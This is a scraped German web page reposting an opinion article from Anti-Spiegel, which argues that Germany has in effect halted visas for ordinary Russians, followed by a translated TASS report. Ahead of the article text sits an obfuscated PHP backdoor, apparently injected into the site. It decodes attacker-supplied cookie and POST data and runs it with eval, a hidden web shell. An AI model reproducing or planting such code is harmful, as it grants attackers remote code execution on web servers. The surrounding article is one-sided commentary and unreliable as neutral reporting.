$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Deutschland stellt die Ausgabe von Visa für Russen de facto ein – Anti-Spiegel – No-Zensur.de Das freie Wort für eine freie Welt
Start Anti-Spiegel Deutschland stellt die Ausgabe von Visa für Russen de facto ein – Anti-Spiegel

Deutschland stellt die Ausgabe von Visa für Russen de facto ein – Anti-Spiegel

0


Das deutsche Außenministerium hat die neuen Regelungen für die Visavergabe an Russen präzisiert. De facto stellt Deutschland die Ausgabe von Visa für durchschnittliche Russen damit ein.

Wenn Russen in die EU oder Menschen aus der EU nach Russland reisen wollen, benötigen sie dazu ein Visum. Normalerweise werden für Privatreisen Touristenvisa beantragt. Das war bis vor kurzem kein Problem, denn es gab ein Abkommen zwischen der EU und Russland über gleiche Bedingungen für die vereinfacht Vergabe solcher Visa. Dieses Abkommen hat die EU gebrochen, denn sie hat es ohne Einhaltung der in dem internationalen Vertrag vorgesehenen Fristen ausgesetzt.

Das deutsche Außenministerium hat nun Details darüber bekannt gegeben, wie die deutschen Konsulate in Russland in Zukunft bei der Bearbeitung der Visa vorgehen sollen. Eines der Dokumente, die Russen beim Visaantrag vorlegen müssen, ist eine Bestätigung ihrer Bank, dass auf ihrem Konto ausreichend Geld vorhanden ist, um die Reisekosten zu begleichen.

Da wegen der Sanktionen der EU russische Kreditkarten in der EU nicht mehr funktionieren, werden keine Bestätigungen russischer Banken mehr anerkannt. Nun wird gefordert, dass Russen Bestätigungen europäischer Banken vorlegen müssen. Nur welcher normale Russe hat schon ein Konto bei einer Bank in der EU? De facto hat Deutschland damit die Visaerteilung für normale Russen eingestellt.

Wenn man bedenkt, dass der Westen am liebsten erreichen möchte, dass die Russen mit ihrer Regierung so unzufrieden werden, dass sie sie am Ende stürzen, muss man sich über die Dummheit der Verantwortlichen in der EU wundern. Mit solchen Entscheidungen, die nur die einfachen Russen treffen, bestätigen sie genau das, was die russische Regierung sagt: Der Westen führt keinen Kampf gegen die russische Regierung oder für die Ukraine, sondern einen Kampf gegen alles Russische und gegen jeden einfachen Russen. Damit hat der Westen der russischen Regierung sogar geholfen, sodass nun die große Mehrheit der Russen hinter ihrer Regierung steht.

Über die europäische Entscheidung hat die russische Nachrichtenagentur TASS berichtet und der Vollständigkeit halber habe ich die TASS-Meldung übersetzt.

Beginn der Übersetzung:

Das deutsche Außenministerium bezeichnet die verschärfte Visumspflicht für Russen als Anpassung an EU-Regeln

Der Sprecher des Ministeriums Christopher Burger sagte, dass die Sanktionen gegen russische Banken es russischen Bürgern nicht erlauben, ihren Aufenthalt in Ländern der Schengen-Zone zu finanzieren

Die Verschärfung der Visabestimmungen für russische Staatsbürger durch Deutschland ist eine Anpassung an die gesamteuropäischen Vorschriften. Das sagte Christopher Burger, Sprecher des deutschen Außenministeriums, am Mittwoch bei einer Pressekonferenz.

„Grundsätzlich muss man unterscheiden: Nicht die Bundesregierung verschärft [die Regeln], sondern die Europäische Kommission hat die angepassten allgemeinen Regeln für die Erteilung von Schengen-Visa auf Russen ausgeweitet“, sagte er. Burger wies darauf hin, dass die gegen russische Banken verhängten Sanktionen russische Bürger daran hindern, ihren Aufenthalt im Schengen-Raum zu finanzieren, so dass beispielsweise für die Erteilung von Touristenvisa jetzt Nachweise von in der EU tätigen Finanzinstituten vorgelegt werden müssen. Ihm zufolge steht die jüngste Anpassung der Vorschriften „im Zusammenhang mit der neuen allgemeinen Vorschrift der Europäischen Kommission.“

Zuvor hatte das Ministerium gegenüber der TASS angegeben, dass die neuen Regeln in den Visazentren der Bundesrepublik Deutschland seit Ende September in Kraft sind. Und das deutsche Außenministerium wies darauf hin, dass russische Staatsbürger bei der Beantragung eines touristischen Schengen-Visums auch Kontoauszüge von Drittländern vorlegen können, und nicht nur von Mitgliedern der Europäischen Union. Die wichtigste Voraussetzung ist, dass es möglich ist, im Schengen-Raum Geld von ihren Karten abzuheben.

Am 6. September billigte die Europäische Kommission einen Vorschlag zur vollständigen Beendigung des Visaerleichterungsabkommens mit Russland. Durch die Aussetzung des Abkommens erhöhen sich die Kosten für ein Schengen-Kurzzeitvisum von 35 auf 80 Euro, die Anzahl der für die Beantragung eines Visums erforderlichen Dokumente und die Ausstellungsdauer auf maximal 45 Tage. Außerdem haben die EU-Länder mehr Möglichkeiten, Visa zu verweigern, sie nur für bestimmte Reisedaten auszustellen oder Visa für eine einmalige Einreise anstelle von Visa für mehrere Einreisen zu erteilen. Darüber hinaus hat der EU-Rat den Mitgliedsländern die Möglichkeit eingeräumt, auf nationaler Ebene zusätzliche Beschränkungen für die Einreise von Russen zu verhängen, bis hin zur Aufhebung bestehender Visa an der Grenze aus Sicherheitsgründen.

Ende der Übersetzung




Source link